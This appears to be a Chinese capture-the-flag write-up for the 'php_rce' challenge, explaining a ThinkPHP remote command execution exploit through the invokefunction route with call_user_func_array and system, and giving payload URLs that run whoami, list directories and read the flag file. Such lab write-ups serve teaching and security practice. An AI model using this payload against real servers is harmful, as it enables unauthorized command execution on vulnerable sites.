88.[4]攻防世界 web php_rce

之前做过,回顾(看了眼之前的wp,跟没做过一样)

属于远程命令执行漏洞

在 PHP 里,system()exec()shell_exec()、反引号(`)等都可用于执行系统命令。

直接访问index.php没效果

复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
  • s=index/think\app/invokefunction :这部分指定了要调用的控制器和方法。在 ThinkPHP 框架里,路由解析机制允许通过这种方式指定要执行的操作,攻击者利用这个特性来调用框架内部的 invokefunction 方法。
  • function=call_user_func_arraycall_user_func_array 是 PHP 的一个内置函数,它能够以数组形式传递参数来调用指定的函数。攻击者利用此函数来动态调用其他函数。
  • vars[0]=system :这里将 system 作为要调用的函数名。system 是 PHP 中用于执行系统命令的函数。
  • vars[1][]=whoami :这是传递给 system 函数的参数,也就是要执行的系统命令。whoami 命令的作用是显示当前系统用户的名称。
复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

ls / 用于列出根目录(/)下的所有文件和文件夹。

复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag
复制代码
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat  
 /flag

cat 用于查看文件内容。

相关推荐
用户9623779544812 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star12 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户9623779544815 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行5 天前
网络安全总结
安全·web安全
red1giant_star5 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透5 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全
一名优秀的码农5 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
Libraeking5 天前
05 安全边界:MCP Server 的权限沙箱与敏感数据保护
安全
努力的lpp5 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入